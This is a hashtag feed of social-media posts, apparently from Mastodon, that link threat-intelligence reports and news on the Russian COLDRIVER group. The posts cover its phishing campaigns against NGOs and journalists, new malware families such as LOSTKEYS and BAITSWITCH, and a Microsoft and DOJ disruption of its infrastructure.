Sekoia.ioDec 4

🇷🇺 French NGO Reporters Without Borders targeted by #Calisto in recent campaign

Sekoia #TDR analysed a recent #Calisto (aka #ColdRiver #Star Blizzard) spear-phishing campaign aimed at Reporters sans frontières and other #Ukraine-supporting organisations.

https://blog.sekoia.io/ngo-reporters-without-borders-targeted-by-calisto-in-recent-campaign/

CyberNetsecIOOct 24

📰 Russian APT COLDRIVER Rapidly Deploys New NOROBOT Malware After Public Disclosure

🇷🇺 Russian APT COLDRIVER rapidly retooled after public disclosure, deploying new NOROBOT & MAYBEROBOT malware. The group is targeting NGOs & policy advisors with a new PowerShell backdoor. ⚡️ #COLDRIVER #APT #ThreatIntel #Russia

🔗 https://cyber.netsecops.io/articles/russian-apt-coldriver-deploys-new-malware-after-disclosure/?utm_source=mastodon&utm_medium=social&utm_campaign=twitter_auto

Russian APT COLDRIVER Rapidly Deploys New NOROBOT Malware After Public Disclosure

Russian APT group COLDRIVER (UNC4057) quickly deployed new malware families, NOROBOT and MAYBEROBOT, after its LOSTKEYS tool was publicly disclosed, targeting high-value individuals.

CyberNetSec.io
The Threat CodexOct 20
To Be (A Robot) or Not to Be: New Malware Attributed to Russia State-Sponsored COLDRIVER
#COLDRIVER #NOROBOT #YESROBOT
https://cloud.google.com/blog/topics/threat-intelligence/new-malware-russia-coldriver
To Be (A Robot) or Not to Be: New Malware Attributed to Russia State-Sponsored COLDRIVER | Google Cloud Blog

Russia state-sponsored COLDRIVER started using new malware immediately following a May public disclosure of their activity.

Google Cloud Blog
CyberVeille.chSep 27
📢 COLDRIVER déploie BAITSWITCH et SIMPLEFIX via une campagne ClickFix avec faux contrôles Cloudflare
📝 Zscaler ThreatLabz publie une analyse détaillée d’une campagne « ClickFi...
📖 cyberveille : https://cyberveille.ch/posts/2025-09-25-coldriver-deploie-baitswitch-et-simplefix-via-une-campagne-clickfix-avec-faux-controles-cloudflare/
🌐 source : https://www.zscaler.com/blogs/security-research/coldriver-updates-arsenal-baitswitch-and-simplefix
#BAITSWITCH #COLDRIVER #Cyberveille
COLDRIVER déploie BAITSWITCH et SIMPLEFIX via une campagne ClickFix avec faux contrôles Cloudflare

Zscaler ThreatLabz publie une analyse détaillée d’une campagne « ClickFix » attribuée à COLDRIVER ciblant des membres de la société civile russe (dissidents, ONG, défenseurs des droits humains). L’enquête met en lumière deux nouvelles familles de malwares, BAITSWITCH et SIMPLEFIX, et des techniques d’ingénierie sociale avancées. • Chaîne d’attaque: des faux checkboxes Cloudflare Turnstile copient dans le presse‑papiers des commandes malveillantes rundll32.exe, incitant les victimes à les exécuter. La campagne est multi‑étapes et recourt à un filtrage côté serveur pour affiner les cibles et limiter l’exposition.

CyberVeille
The Threat CodexSep 24
COLDRIVER Updates Arsenal with BAITSWITCH and SIMPLEFIX
#COLDRIVER #SIMPLEFIX #BAITSWITCH
https://www.zscaler.com/blogs/security-research/coldriver-updates-arsenal-baitswitch-and-simplefix
COLDRIVER Adds BAITSWITCH and SIMPLEFIX | ThreatLabz

The Russia-linked group COLDRIVER targeted dissidents and their supporters using a ClickFix technique, resulting in the deployment of BAITSWITCH and SIMPLEFIX.

CEOTECH.ITMay 12, 2025

Google scopre LostKeys: malware russo per lo spionaggio
#ClickFix #COLDRIVER #CyberEspionage #Cybercrime #FSB #Geopolitica #Google #LostKeys #Malware #Notizie #Russia #Sicurezza #Spionaggio #StateSponsoredHacking #TechNews #Tecnologia #ThreatIntelligence #VBS

https://www.ceotech.it/google-scopre-lostkeys-malware-russo-per-lo-spionaggio/

securityaffairsMay 9, 2025
#Russia-linked #ColdRiver used #LostKeys malware in recent attacks
https://securityaffairs.com/177638/apt/russia-linked-coldriver-used-lostkeys-malware-in-recent-attacks.html
#securityaffairs #hacking
Russia-linked ColdRiver used LostKeys malware in recent attacks

Since early 2025, Russia-linked ColdRiver has used LostKeys malware to steal files in espionage attacks on Western governments and orgs.

Security Affairs
The Threat CodexMay 7, 2025
COLDRIVER Using New Malware To Steal Documents From Western Targets and NGOs
#COLDRIVER #LOSTKEYS
https://cloud.google.com/blog/topics/threat-intelligence/coldriver-steal-documents-western-targets-ngos
COLDRIVER Using New Malware To Steal Documents From Western Targets and NGOs | Google Cloud Blog

Russian government-backed group COLDRIVER is using LOSTKEYS malware to steal files and system information from NGOs and western targets.

Google Cloud Blog
The Citizen Lab RSSDec 12, 2024

Rebekah Brown and John Scott-Railton on Distilling Cyber Policy podcast

https://citizenlab.ca/2024/12/rebekah-brown-and-john-scott-railton-on-distilling-cyber-policy-podcast/

#COLDRIVER #News

Rebekah Brown and John Scott-Railton on Distilling Cyber Policy podcast - The Citizen Lab

In the latest episode of the Distilling Cyber Policy podcast, Alex Botting and Jen Ellis from the Center for Cybersecurity Policy & Law are joined by Rebekah Brown and John Scott-Railton, senior researchers at the Citizen Lab. Together, they discuss the Citizen Lab's “Rivers of Phish” report on sophisticated phishing targeting Russia’s perceived adversaries. The report was a collaborative investigation with Access Now alongside civil society organizations First Department, Arjuna Team, and RESIDENT.ngo.

The Citizen Lab
Tech Cybersecurity NieuwsOct 3, 2024
Microsoft en doj verstoren russische fsb-hackersinfrastructuur https://www.trendingtech.news/trending-news/2024/10/40519/microsoft-en-doj-verstoren-russische-fsb-hackersinfrastructuur #Microsoft #DOJ #FSB #spear-phishing #ColdRiver #Trending #News #Nieuws
Microsoft en doj verstoren russische fsb-hackersinfrastructuur

Microsoft en het Amerikaanse Ministerie van Justitie (DOJ) hebben de aanvalsinfrastructuur van een Russische hackersgroep, bekend als ColdRiver, ontmanteld doo

Tech Nieuws